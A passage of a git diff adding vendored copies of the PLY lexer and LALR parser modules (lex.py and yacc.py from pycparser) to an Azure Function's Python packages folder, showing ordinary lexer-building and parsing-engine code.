+# associated with the yacc() call if none was provided. +# ----------------------------------------------------------------------------- +def get_caller_module_dict(levels): + f = sys._getframe(levels) + ldict = f.f_globals.copy() + if f.f_globals != f.f_locals: + ldict.update(f.f_locals) + return ldict + +# ----------------------------------------------------------------------------- +# _funcs_to_names() +# +# Given a list of regular expression functions, this converts it to a list +# suitable for output to a table file +# ----------------------------------------------------------------------------- +def _funcs_to_names(funclist, namelist): + result = [] + for f, name in zip(funclist, namelist): + if f and f[0]: + result.append((name, f[1])) + else: + result.append(f) + return result + +# ----------------------------------------------------------------------------- +# _names_to_funcs() +# +# Given a list of regular expression function names, this converts it back to +# functions. +# ----------------------------------------------------------------------------- +def _names_to_funcs(namelist, fdict): + result = [] + for n in namelist: + if n and n[0]: + result.append((fdict[n[0]], n[1])) + else: + result.append(n) + return result + +# ----------------------------------------------------------------------------- +# _form_master_re() +# +# This function takes a list of all of the regex components and attempts to +# form the master regular expression. Given limitations in the Python re +# module, it may be necessary to break the master regex into separate expressions. +# ----------------------------------------------------------------------------- +def _form_master_re(relist, reflags, ldict, toknames): + if not relist: + return [] + regex = '|'.join(relist) + try: + lexre = re.compile(regex, reflags) + + # Build the index to function map for the matching engine + lexindexfunc = [None] * (max(lexre.groupindex.values()) + 1) + lexindexnames = lexindexfunc[:] + + for f, i in lexre.groupindex.items(): + handle = ldict.get(f, None) + if type(handle) in (types.FunctionType, types.MethodType): + lexindexfunc[i] = (handle, toknames[f]) + lexindexnames[i] = f + elif handle is not None: + lexindexnames[i] = f + if f.find('ignore_') > 0: + lexindexfunc[i] = (None, None) + else: + lexindexfunc[i] = (None, toknames[f]) + + return [(lexre, lexindexfunc)], [regex], [lexindexnames] + except Exception: + m = int(len(relist)/2) + if m == 0: + m = 1 + llist, lre, lnames = _form_master_re(relist[:m], reflags, ldict, toknames) + rlist, rre, rnames = _form_master_re(relist[m:], reflags, ldict, toknames) + return (llist+rlist), (lre+rre), (lnames+rnames) + +# ----------------------------------------------------------------------------- +# def _statetoken(s,names) +# +# Given a declaration name s of the form "t_" and a dictionary whose keys are +# state names, this function returns a tuple (states,tokenname) where states +# is a tuple of state names and tokenname is the name of the token. For example, +# calling this with s = "t_foo_bar_SPAM" might return (('foo','bar'),'SPAM') +# ----------------------------------------------------------------------------- +def _statetoken(s, names): + nonstate = 1 + parts = s.split('_') + for i, part in enumerate(parts[1:], 1): + if part not in names and part != 'ANY': + break + + if i > 1: + states = tuple(parts[1:i]) + else: + states = ('INITIAL',) + + if 'ANY' in states: + states = tuple(names) + + tokenname = '_'.join(parts[i:]) + return (states, tokenname) + + +# ----------------------------------------------------------------------------- +# LexerReflect() +# +# This class represents information needed to build a lexer as extracted from a +# user's input file. +# ----------------------------------------------------------------------------- +class LexerReflect(object): + def __init__(self, ldict, log=None, reflags=0): + self.ldict = ldict + self.error_func = None + self.tokens = [] + self.reflags = reflags + self.stateinfo = {'INITIAL': 'inclusive'} + self.modules = set() + self.error = False + self.log = PlyLogger(sys.stderr) if log is None else log + + # Get all of the basic information + def get_all(self): + self.get_tokens() + self.get_literals() + self.get_states() + self.get_rules() + + # Validate all of the information + def validate_all(self): + self.validate_tokens() + self.validate_literals() + self.validate_rules() + return self.error + + # Get the tokens map + def get_tokens(self): + tokens = self.ldict.get('tokens', None) + if not tokens: + self.log.error('No token list is defined') + self.error = True + return + + if not isinstance(tokens, (list, tuple)): + self.log.error('tokens must be a list or tuple') + self.error = True + return + + if not tokens: + self.log.error('tokens is empty') + self.error = True + return + + self.tokens = tokens + + # Validate the tokens + def validate_tokens(self): + terminals = {} + for n in self.tokens: + if not _is_identifier.match(n): + self.log.error("Bad token name '%s'", n) + self.error = True + if n in terminals: + self.log.warning("Token '%s' multiply defined", n) + terminals[n] = 1 + + # Get the literals specifier + def get_literals(self): + self.literals = self.ldict.get('literals', '') + if not self.literals: + self.literals = '' + + # Validate literals + def validate_literals(self): + try: + for c in self.literals: + if not isinstance(c, StringTypes) or len(c) > 1: + self.log.error('Invalid literal %s. Must be a single character', repr(c)) + self.error = True + + except TypeError: + self.log.error('Invalid literals specification. literals must be a sequence of characters') + self.error = True + + def get_states(self): + self.states = self.ldict.get('states', None) + # Build statemap + if self.states: + if not isinstance(self.states, (tuple, list)): + self.log.error('states must be defined as a tuple or list') + self.error = True + else: + for s in self.states: + if not isinstance(s, tuple) or len(s) != 2: + self.log.error("Invalid state specifier %s. Must be a tuple (statename,'exclusive|inclusive')", repr(s)) + self.error = True + continue + name, statetype = s + if not isinstance(name, StringTypes): + self.log.error('State name %s must be a string', repr(name)) + self.error = True + continue + if not (statetype == 'inclusive' or statetype == 'exclusive'): + self.log.error("State type for state %s must be 'inclusive' or 'exclusive'", name) + self.error = True + continue + if name in self.stateinfo: + self.log.error("State '%s' already defined", name) + self.error = True + continue + self.stateinfo[name] = statetype + + # Get all of the symbols with a t_ prefix and sort them into various + # categories (functions, strings, error functions, and ignore characters) + + def get_rules(self): + tsymbols = [f for f in self.ldict if f[:2] == 't_'] + + # Now build up a list of functions and a list of strings + self.toknames = {} # Mapping of symbols to token names + self.funcsym = {} # Symbols defined as functions + self.strsym = {} # Symbols defined as strings + self.ignore = {} # Ignore strings by state + self.errorf = {} # Error functions by state + self.eoff = {} # EOF functions by state + + for s in self.stateinfo: + self.funcsym[s] = [] + self.strsym[s] = [] + + if len(tsymbols) == 0: + self.log.error('No rules of the form t_rulename are defined') + self.error = True + return + + for f in tsymbols: + t = self.ldict[f] + states, tokname = _statetoken(f, self.stateinfo) + self.toknames[f] = tokname + + if hasattr(t, '__call__'): + if tokname == 'error': + for s in states: + self.errorf[s] = t + elif tokname == 'eof': + for s in states: + self.eoff[s] = t + elif tokname == 'ignore': + line = t.__code__.co_firstlineno + file = t.__code__.co_filename + self.log.error("%s:%d: Rule '%s' must be defined as a string", file, line, t.__name__) + self.error = True + else: + for s in states: + self.funcsym[s].append((f, t)) + elif isinstance(t, StringTypes): + if tokname == 'ignore': + for s in states: + self.ignore[s] = t + if '\\' in t: + self.log.warning("%s contains a literal backslash '\\'", f) + + elif tokname == 'error': + self.log.error("Rule '%s' must be defined as a function", f) + self.error = True + else: + for s in states: + self.strsym[s].append((f, t)) + else: + self.log.error('%s not defined as a function or string', f) + self.error = True + + # Sort the functions by line number + for f in self.funcsym.values(): + f.sort(key=lambda x: x[1].__code__.co_firstlineno) + + # Sort the strings by regular expression length + for s in self.strsym.values(): + s.sort(key=lambda x: len(x[1]), reverse=True) + + # Validate all of the t_rules collected + def validate_rules(self): + for state in self.stateinfo: + # Validate all rules defined by functions + + for fname, f in self.funcsym[state]: + line = f.__code__.co_firstlineno + file = f.__code__.co_filename + module = inspect.getmodule(f) + self.modules.add(module) + + tokname = self.toknames[fname] + if isinstance(f, types.MethodType): + reqargs = 2 + else: + reqargs = 1 + nargs = f.__code__.co_argcount + if nargs > reqargs: + self.log.error("%s:%d: Rule '%s' has too many arguments", file, line, f.__name__) + self.error = True + continue + + if nargs < reqargs: + self.log.error("%s:%d: Rule '%s' requires an argument", file, line, f.__name__) + self.error = True + continue + + if not _get_regex(f): + self.log.error("%s:%d: No regular expression defined for rule '%s'", file, line, f.__name__) + self.error = True + continue + + try: + c = re.compile('(?P<%s>%s)' % (fname, _get_regex(f)), self.reflags) + if c.match(''): + self.log.error("%s:%d: Regular expression for rule '%s' matches empty string", file, line, f.__name__) + self.error = True + except re.error as e: + self.log.error("%s:%d: Invalid regular expression for rule '%s'. %s", file, line, f.__name__, e) + if '#' in _get_regex(f): + self.log.error("%s:%d. Make sure '#' in rule '%s' is escaped with '\\#'", file, line, f.__name__) + self.error = True + + # Validate all rules defined by strings + for name, r in self.strsym[state]: + tokname = self.toknames[name] + if tokname == 'error': + self.log.error("Rule '%s' must be defined as a function", name) + self.error = True + continue + + if tokname not in self.tokens and tokname.find('ignore_') < 0: + self.log.error("Rule '%s' defined for an unspecified token %s", name, tokname) + self.error = True + continue + + try: + c = re.compile('(?P<%s>%s)' % (name, r), self.reflags) + if (c.match('')): + self.log.error("Regular expression for rule '%s' matches empty string", name) + self.error = True + except re.error as e: + self.log.error("Invalid regular expression for rule '%s'. %s", name, e) + if '#' in r: + self.log.error("Make sure '#' in rule '%s' is escaped with '\\#'", name) + self.error = True + + if not self.funcsym[state] and not self.strsym[state]: + self.log.error("No rules defined for state '%s'", state) + self.error = True + + # Validate the error function + efunc = self.errorf.get(state, None) + if efunc: + f = efunc + line = f.__code__.co_firstlineno + file = f.__code__.co_filename + module = inspect.getmodule(f) + self.modules.add(module) + + if isinstance(f, types.MethodType): + reqargs = 2 + else: + reqargs = 1 + nargs = f.__code__.co_argcount + if nargs > reqargs: + self.log.error("%s:%d: Rule '%s' has too many arguments", file, line, f.__name__) + self.error = True + + if nargs < reqargs: + self.log.error("%s:%d: Rule '%s' requires an argument", file, line, f.__name__) + self.error = True + + for module in self.modules: + self.validate_module(module) + + # ----------------------------------------------------------------------------- + # validate_module() + # + # This checks to see if there are duplicated t_rulename() functions or strings + # in the parser input file. This is done using a simple regular expression + # match on each line in the source code of the given module. + # ----------------------------------------------------------------------------- + + def validate_module(self, module): + try: + lines, linen = inspect.getsourcelines(module) + except IOError: + return + + fre = re.compile(r'\s*def\s+(t_[a-zA-Z_0-9]*)\(') + sre = re.compile(r'\s*(t_[a-zA-Z_0-9]*)\s*=') + + counthash = {} + linen += 1 + for line in lines: + m = fre.match(line) + if not m: + m = sre.match(line) + if m: + name = m.group(1) + prev = counthash.get(name) + if not prev: + counthash[name] = linen + else: + filename = inspect.getsourcefile(module) + self.log.error('%s:%d: Rule %s redefined. Previously defined on line %d', filename, linen, name, prev) + self.error = True + linen += 1 + +# ----------------------------------------------------------------------------- +# lex(module) +# +# Build all of the regular expression rules from definitions in the supplied module +# ----------------------------------------------------------------------------- +def lex(module=None, object=None, debug=False, optimize=False, lextab='lextab', + reflags=int(re.VERBOSE), nowarn=False, outputdir=None, debuglog=None, errorlog=None): + + if lextab is None: + lextab = 'lextab' + + global lexer + + ldict = None + stateinfo = {'INITIAL': 'inclusive'} + lexobj = Lexer() + lexobj.lexoptimize = optimize + global token, input + + if errorlog is None: + errorlog = PlyLogger(sys.stderr) + + if debug: + if debuglog is None: + debuglog = PlyLogger(sys.stderr) + + # Get the module dictionary used for the lexer + if object: + module = object + + # Get the module dictionary used for the parser + if module: + _items = [(k, getattr(module, k)) for k in dir(module)] + ldict = dict(_items) + # If no __file__ attribute is available, try to obtain it from the __module__ instead + if '__file__' not in ldict: + ldict['__file__'] = sys.modules[ldict['__module__']].__file__ + else: + ldict = get_caller_module_dict(2) + + # Determine if the module is package of a package or not. + # If so, fix the tabmodule setting so that tables load correctly + pkg = ldict.get('__package__') + if pkg and isinstance(lextab, str): + if '.' not in lextab: + lextab = pkg + '.' + lextab + + # Collect parser information from the dictionary + linfo = LexerReflect(ldict, log=errorlog, reflags=reflags) + linfo.get_all() + if not optimize: + if linfo.validate_all(): + raise SyntaxError("Can't build lexer") + + if optimize and lextab: + try: + lexobj.readtab(lextab, ldict) + token = lexobj.token + input = lexobj.input + lexer = lexobj + return lexobj + + except ImportError: + pass + + # Dump some basic debugging information + if debug: + debuglog.info('lex: tokens = %r', linfo.tokens) + debuglog.info('lex: literals = %r', linfo.literals) + debuglog.info('lex: states = %r', linfo.stateinfo) + + # Build a dictionary of valid token names + lexobj.lextokens = set() + for n in linfo.tokens: + lexobj.lextokens.add(n) + + # Get literals specification + if isinstance(linfo.literals, (list, tuple)): + lexobj.lexliterals = type(linfo.literals[0])().join(linfo.literals) + else: + lexobj.lexliterals = linfo.literals + + lexobj.lextokens_all = lexobj.lextokens | set(lexobj.lexliterals) + + # Get the stateinfo dictionary + stateinfo = linfo.stateinfo + + regexs = {} + # Build the master regular expressions + for state in stateinfo: + regex_list = [] + + # Add rules defined by functions first + for fname, f in linfo.funcsym[state]: + line = f.__code__.co_firstlineno + file = f.__code__.co_filename + regex_list.append('(?P<%s>%s)' % (fname, _get_regex(f))) + if debug: + debuglog.info("lex: Adding rule %s -> '%s' (state '%s')", fname, _get_regex(f), state) + + # Now add all of the simple rules + for name, r in linfo.strsym[state]: + regex_list.append('(?P<%s>%s)' % (name, r)) + if debug: + debuglog.info("lex: Adding rule %s -> '%s' (state '%s')", name, r, state) + + regexs[state] = regex_list + + # Build the master regular expressions + + if debug: + debuglog.info('lex: ==== MASTER REGEXS FOLLOW ====') + + for state in regexs: + lexre, re_text, re_names = _form_master_re(regexs[state], reflags, ldict, linfo.toknames) + lexobj.lexstatere[state] = lexre + lexobj.lexstateretext[state] = re_text + lexobj.lexstaterenames[state] = re_names + if debug: + for i, text in enumerate(re_text): + debuglog.info("lex: state '%s' : regex[%d] = '%s'", state, i, text) + + # For inclusive states, we need to add the regular expressions from the INITIAL state + for state, stype in stateinfo.items(): + if state != 'INITIAL' and stype == 'inclusive': + lexobj.lexstatere[state].extend(lexobj.lexstatere['INITIAL']) + lexobj.lexstateretext[state].extend(lexobj.lexstateretext['INITIAL']) + lexobj.lexstaterenames[state].extend(lexobj.lexstaterenames['INITIAL']) + + lexobj.lexstateinfo = stateinfo + lexobj.lexre = lexobj.lexstatere['INITIAL'] + lexobj.lexretext = lexobj.lexstateretext['INITIAL'] + lexobj.lexreflags = reflags + + # Set up ignore variables + lexobj.lexstateignore = linfo.ignore + lexobj.lexignore = lexobj.lexstateignore.get('INITIAL', '') + + # Set up error functions + lexobj.lexstateerrorf = linfo.errorf + lexobj.lexerrorf = linfo.errorf.get('INITIAL', None) + if not lexobj.lexerrorf: + errorlog.warning('No t_error rule is defined') + + # Set up eof functions + lexobj.lexstateeoff = linfo.eoff + lexobj.lexeoff = linfo.eoff.get('INITIAL', None) + + # Check state information for ignore and error rules + for s, stype in stateinfo.items(): + if stype == 'exclusive': + if s not in linfo.errorf: + errorlog.warning("No error rule is defined for exclusive state '%s'", s) + if s not in linfo.ignore and lexobj.lexignore: + errorlog.warning("No ignore rule is defined for exclusive state '%s'", s) + elif stype == 'inclusive': + if s not in linfo.errorf: + linfo.errorf[s] = linfo.errorf.get('INITIAL', None) + if s not in linfo.ignore: + linfo.ignore[s] = linfo.ignore.get('INITIAL', '') + + # Create global versions of the token() and input() functions + token = lexobj.token + input = lexobj.input + lexer = lexobj + + # If in optimize mode, we write the lextab + if lextab and optimize: + if outputdir is None: + # If no output directory is set, the location of the output files + # is determined according to the following rules: + # - If lextab specifies a package, files go into that package directory + # - Otherwise, files go in the same directory as the specifying module + if isinstance(lextab, types.ModuleType): + srcfile = lextab.__file__ + else: + if '.' not in lextab: + srcfile = ldict['__file__'] + else: + parts = lextab.split('.') + pkgname = '.'.join(parts[:-1]) + exec('import %s' % pkgname) + srcfile = getattr(sys.modules[pkgname], '__file__', '') + outputdir = os.path.dirname(srcfile) + try: + lexobj.writetab(lextab, outputdir) + except IOError as e: + errorlog.warning("Couldn't write lextab module %r. %s" % (lextab, e)) + + return lexobj + +# ----------------------------------------------------------------------------- +# runmain() +# +# This runs the lexer as a main program +# ----------------------------------------------------------------------------- + +def runmain(lexer=None, data=None): + if not data: + try: + filename = sys.argv[1] + f = open(filename) + data = f.read() + f.close() + except IndexError: + sys.stdout.write('Reading from standard input (type EOF to end):\n') + data = sys.stdin.read() + + if lexer: + _input = lexer.input + else: + _input = input + _input(data) + if lexer: + _token = lexer.token + else: + _token = token + + while True: + tok = _token() + if not tok: + break + sys.stdout.write('(%s,%r,%d,%d)\n' % (tok.type, tok.value, tok.lineno, tok.lexpos)) + +# ----------------------------------------------------------------------------- +# @TOKEN(regex) +# +# This decorator function can be used to set the regex expression on a function +# when its docstring might need to be set in an alternative way +# ----------------------------------------------------------------------------- + +def TOKEN(r): + def set_regex(f): + if hasattr(r, '__call__'): + f.regex = _get_regex(r) + else: + f.regex = r + return f + return set_regex + +# Alternative spelling of the TOKEN decorator +Token = TOKEN diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/yacc.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/yacc.py new file mode 100644 index 0000000..18c9a75 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/yacc.py @@ -0,0 +1,3494 @@ +# ----------------------------------------------------------------------------- +# ply: yacc.py +# +# Copyright (C) 2001-2017 +# David M. Beazley (Dabeaz LLC) +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are +# met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the David Beazley or Dabeaz LLC may be used to +# endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# ----------------------------------------------------------------------------- +# +# This implements an LR parser that is constructed from grammar rules defined +# as Python functions. The grammer is specified by supplying the BNF inside +# Python documentation strings. The inspiration for this technique was borrowed +# from John Aycock's Spark parsing system. PLY might be viewed as cross between +# Spark and the GNU bison utility. +# +# The current implementation is only somewhat object-oriented. The +# LR parser itself is defined in terms of an object (which allows multiple +# parsers to co-exist). However, most of the variables used during table +# construction are defined in terms of global variables. Users shouldn't +# notice unless they are trying to define multiple parsers at the same +# time using threads (in which case they should have their head examined). +# +# This implementation supports both SLR and LALR(1) parsing. LALR(1) +# support was originally implemented by Elias Ioup (ezioup@alumni.uchicago.edu), +# using the algorithm found in Aho, Sethi, and Ullman "Compilers: Principles, +# Techniques, and Tools" (The Dragon Book). LALR(1) has since been replaced +# by the more efficient DeRemer and Pennello algorithm. +# +# :::::::: WARNING ::::::: +# +# Construction of LR parsing tables is fairly complicated and expensive. +# To make this module run fast, a *LOT* of work has been put into +# optimization---often at the expensive of readability and what might +# consider to be good Python "coding style." Modify the code at your +# own risk! +# ---------------------------------------------------------------------------- + +import re +import types +import sys +import os.path +import inspect +import base64 +import warnings + +__version__ = '3.10' +__tabversion__ = '3.10' + +#----------------------------------------------------------------------------- +# === User configurable parameters === +# +# Change these to modify the default behavior of yacc (if you wish) +#----------------------------------------------------------------------------- + +yaccdebug = True # Debugging mode. If set, yacc generates a + # a 'parser.out' file in the current directory + +debug_file = 'parser.out' # Default name of the debugging file +tab_module = 'parsetab' # Default name of the table module +default_lr = 'LALR' # Default LR table generation method + +error_count = 3 # Number of symbols that must be shifted to leave recovery mode + +yaccdevel = False # Set to True if developing yacc. This turns off optimized + # implementations of certain functions. + +resultlimit = 40 # Size limit of results when running in debug mode. + +pickle_protocol = 0 # Protocol to use when writing pickle files + +# String type-checking compatibility +if sys.version_info[0] < 3: + string_types = basestring +else: + string_types = str + +MAXINT = sys.maxsize + +# This object is a stand-in for a logging object created by the +# logging module. PLY will use this by default to create things +# such as the parser.out file. If a user wants more detailed +# information, they can create their own logging object and pass +# it into PLY. + +class PlyLogger(object): + def __init__(self, f): + self.f = f + + def debug(self, msg, *args, **kwargs): + self.f.write((msg % args) + '\n') + + info = debug + + def warning(self, msg, *args, **kwargs): + self.f.write('WARNING: ' + (msg % args) + '\n') + + def error(self, msg, *args, **kwargs): + self.f.write('ERROR: ' + (msg % args) + '\n') + + critical = debug + +# Null logger is used when no output is generated. Does nothing. +class NullLogger(object): + def __getattribute__(self, name): + return self + + def __call__(self, *args, **kwargs): + return self + +# Exception raised for yacc-related errors +class YaccError(Exception): + pass + +# Format the result message that the parser produces when running in debug mode. +def format_result(r): + repr_str = repr(r) + if '\n' in repr_str: + repr_str = repr(repr_str) + if len(repr_str) > resultlimit: + repr_str = repr_str[:resultlimit] + ' ...' + result = '<%s @ 0x%x> (%s)' % (type(r).__name__, id(r), repr_str) + return result + +# Format stack entries when the parser is running in debug mode +def format_stack_entry(r): + repr_str = repr(r) + if '\n' in repr_str: + repr_str = repr(repr_str) + if len(repr_str) < 16: + return repr_str + else: + return '<%s @ 0x%x>' % (type(r).__name__, id(r)) + +# Panic mode error recovery support. This feature is being reworked--much of the +# code here is to offer a deprecation/backwards compatible transition + +_errok = None +_token = None +_restart = None +_warnmsg = '''PLY: Don't use global functions errok(), token(), and restart() in p_error(). +Instead, invoke the methods on the associated parser instance: + + def p_error(p): + ... + # Use parser.errok(), parser.token(), parser.restart() + ... + + parser = yacc.yacc() +''' + +def errok(): + warnings.warn(_warnmsg) + return _errok() + +def restart(): + warnings.warn(_warnmsg) + return _restart() + +def token(): + warnings.warn(_warnmsg) + return _token() + +# Utility function to call the p_error() function with some deprecation hacks +def call_errorfunc(errorfunc, token, parser): + global _errok, _token, _restart + _errok = parser.errok + _token = parser.token + _restart = parser.restart + r = errorfunc(token) + try: + del _errok, _token, _restart + except NameError: + pass + return r + +#----------------------------------------------------------------------------- +# === LR Parsing Engine === +# +# The following classes are used for the LR parser itself. These are not +# used during table construction and are independent of the actual LR +# table generation algorithm +#----------------------------------------------------------------------------- + +# This class is used to hold non-terminal grammar symbols during parsing. +# It normally has the following attributes set: +# .type = Grammar symbol type +# .value = Symbol value +# .lineno = Starting line number +# .endlineno = Ending line number (optional, set automatically) +# .lexpos = Starting lex position +# .endlexpos = Ending lex position (optional, set automatically) + +class YaccSymbol: + def __str__(self): + return self.type + + def __repr__(self): + return str(self) + +# This class is a wrapper around the objects actually passed to each +# grammar rule. Index lookup and assignment actually assign the +# .value attribute of the underlying YaccSymbol object. +# The lineno() method returns the line number of a given +# item (or 0 if not defined). The linespan() method returns +# a tuple of (startline,endline) representing the range of lines +# for a symbol. The lexspan() method returns a tuple (lexpos,endlexpos) +# representing the range of positional information for a symbol. + +class YaccProduction: + def __init__(self, s, stack=None): + self.slice = s + self.stack = stack + self.lexer = None + self.parser = None + + def __getitem__(self, n): + if isinstance(n, slice): + return [s.value for s in self.slice[n]] + elif n >= 0: + return self.slice[n].value + else: + return self.stack[n].value + + def __setitem__(self, n, v): + self.slice[n].value = v + + def __getslice__(self, i, j): + return [s.value for s in self.slice[i:j]] + + def __len__(self): + return len(self.slice) + + def lineno(self, n): + return getattr(self.slice[n], 'lineno', 0) + + def set_lineno(self, n, lineno): + self.slice[n].lineno = lineno + + def linespan(self, n): + startline = getattr(self.slice[n], 'lineno', 0) + endline = getattr(self.slice[n], 'endlineno', startline) + return startline, endline + + def lexpos(self, n): + return getattr(self.slice[n], 'lexpos', 0) + + def lexspan(self, n): + startpos = getattr(self.slice[n], 'lexpos', 0) + endpos = getattr(self.slice[n], 'endlexpos', startpos) + return startpos, endpos + + def error(self): + raise SyntaxError + +# ----------------------------------------------------------------------------- +# == LRParser == +# +# The LR Parsing engine. +# ----------------------------------------------------------------------------- + +class LRParser: + def __init__(self, lrtab, errorf): + self.productions = lrtab.lr_productions + self.action = lrtab.lr_action + self.goto = lrtab.lr_goto + self.errorfunc = errorf + self.set_defaulted_states() + self.errorok = True + + def errok(self): + self.errorok = True + + def restart(self): + del self.statestack[:] + del self.symstack[:] + sym = YaccSymbol() + sym.type = '$end' + self.symstack.append(sym) + self.statestack.append(0) + + # Defaulted state support. + # This method identifies parser states where there is only one possible reduction action. + # For such states, the parser can make a choose to make a rule reduction without consuming + # the next look-ahead token. This delayed invocation of the tokenizer can be useful in + # certain kinds of advanced parsing situations where the lexer and parser interact with + # each other or change states (i.e., manipulation of scope, lexer states, etc.). + # + # See: https://www.gnu.org/software/bison/manual/html_node/Default-Reductions.html#Default-Reductions + def set_defaulted_states(self): + self.defaulted_states = {} + for state, actions in self.action.items(): + rules = list(actions.values()) + if len(rules) == 1 and rules[0] < 0: + self.defaulted_states[state] = rules[0] + + def disable_defaulted_states(self): + self.defaulted_states = {} + + def parse(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + if debug or yaccdevel: + if isinstance(debug, int): + debug = PlyLogger(sys.stderr) + return self.parsedebug(input, lexer, debug, tracking, tokenfunc) + elif tracking: + return self.parseopt(input, lexer, debug, tracking, tokenfunc) + else: + return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc) + + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # parsedebug(). + # + # This is the debugging enabled version of parse(). All changes made to the + # parsing engine should be made here. Optimized versions of this function + # are automatically created by the ply/ygen.py script. This script cuts out + # sections enclosed in markers such as this: + # + # #--! DEBUG + # statements + # #--! DEBUG + # + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + def parsedebug(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + #--! parsedebug-start + lookahead = None # Current lookahead symbol + lookaheadstack = [] # Stack of lookahead symbols + actions = self.action # Local reference to action table (to avoid lookup on self.) + goto = self.goto # Local reference to goto table (to avoid lookup on self.) + prod = self.productions # Local reference to production list (to avoid lookup on self.) + defaulted_states = self.defaulted_states # Local reference to defaulted states + pslice = YaccProduction(None) # Production object passed to grammar rules + errorcount = 0 # Used during error recovery + + #--! DEBUG + debug.info('PLY: PARSE DEBUG START') + #--! DEBUG + + # If no lexer was given, we will try to use the lex module + if not lexer: + from . import lex + lexer = lex.lexer + + # Set up the lexer and parser objects on pslice + pslice.lexer = lexer + pslice.parser = self + + # If input was supplied, pass to lexer + if input is not None: + lexer.input(input) + + if tokenfunc is None: + # Tokenize function + get_token = lexer.token + else: + get_token = tokenfunc + + # Set the parser() token method (sometimes used in error recovery) + self.token = get_token + + # Set up the state and symbol stacks + + statestack = [] # Stack of parsing states + self.statestack = statestack + symstack = [] # Stack of grammar symbols + self.symstack = symstack + + pslice.stack = symstack # Put in the production + errtoken = None # Err token + + # The start state is assumed to be (0,$end) + + statestack.append(0) + sym = YaccSymbol() + sym.type = '$end' + symstack.append(sym) + state = 0 + while True: + # Get the next symbol on the input. If a lookahead symbol + # is already set, we just use that. Otherwise, we'll pull + # the next token off of the lookaheadstack or from the lexer + + #--! DEBUG + debug.debug('') + debug.debug('State : %s', state) + #--! DEBUG + + if state not in defaulted_states: + if not lookahead: + if not lookaheadstack: + lookahead = get_token() # Get the next token + else: + lookahead = lookaheadstack.pop() + if not lookahead: + lookahead = YaccSymbol() + lookahead.type = '$end' + + # Check the action table + ltype = lookahead.type + t = actions[state].get(ltype) + else: + t = defaulted_states[state] + #--! DEBUG + debug.debug('Defaulted state %s: Reduce using %d', state, -t) + #--! DEBUG + + #--! DEBUG + debug.debug('Stack : %s', + ('%s . %s' % (' '.join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip()) + #--! DEBUG + + if t is not None: + if t > 0: + # shift a symbol on the stack + statestack.append(t) + state = t + + #--! DEBUG + debug.debug('Action : Shift and goto state %s', t) + #--! DEBUG + + symstack.append(lookahead) + lookahead = None + + # Decrease error count on successful shift + if errorcount: + errorcount -= 1 + continue + + if t < 0: + # reduce a symbol on the stack, emit a production + p = prod[-t] + pname = p.name + plen = p.len + + # Get production function + sym = YaccSymbol() + sym.type = pname # Production name + sym.value = None + + #--! DEBUG + if plen: + debug.info('Action : Reduce rule [%s] with %s and goto state %d', p.str, + '['+','.join([format_stack_entry(_v.value) for _v in symstack[-plen:]])+']', + goto[statestack[-1-plen]][pname]) + else: + debug.info('Action : Reduce rule [%s] with %s and goto state %d', p.str, [], + goto[statestack[-1]][pname]) + + #--! DEBUG + + if plen: + targ = symstack[-plen-1:] + targ[0] = sym + + #--! TRACKING + if tracking: + t1 = targ[1] + sym.lineno = t1.lineno + sym.lexpos = t1.lexpos + t1 = targ[-1] + sym.endlineno = getattr(t1, 'endlineno', t1.lineno) + sym.endlexpos = getattr(t1, 'endlexpos', t1.lexpos) + #--! TRACKING + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # below as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + del symstack[-plen:] + self.state = state + p.callable(pslice) + del statestack[-plen:] + #--! DEBUG + debug.info('Result : %s', format_result(pslice[0])) + #--! DEBUG + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + symstack.extend(targ[1:-1]) # Put the production slice back on the stack + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + else: + + #--! TRACKING + if tracking: + sym.lineno = lexer.lineno + sym.lexpos = lexer.lexpos + #--! TRACKING + + targ = 